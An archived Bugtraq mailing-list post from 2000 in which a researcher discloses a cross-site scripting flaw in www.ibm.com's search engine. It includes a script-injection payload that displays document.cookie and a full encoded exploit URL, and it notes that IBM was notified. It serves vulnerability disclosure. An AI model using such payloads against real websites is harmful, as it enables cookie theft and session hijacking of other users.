Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: Lame cross site scripting against www.ibm.com

Lame cross site scripting against www.ibm.com

From: Georgi Guninski <guninski_at_GUNINSKI.COM>
Date: Mon, 30 Oct 2000 17:59:25 +0200

I know this is really lame issue but guess more sites suffer from it.
The search engine at http://www.ibm.com allows cross site scripting.
Try searching for:
+IBM -</TITLE><SCRIPT>alert(document.cookie)</SCRIPT>
or try the following url:
http://www.ibm.com/Search?q=%2BIBM+-%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28document.cookie%29%3C%2FSCRIPT%3E&realm=All+of+IBM&v=10&lang=en&cc=us&Go.x=6&Go.y=14

At least it seems not to allow SSI.

Vendor status:
IBM was notified at least 4 days ago.

Regards,
Georgi Guninski
Received on Nov 03 2000

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]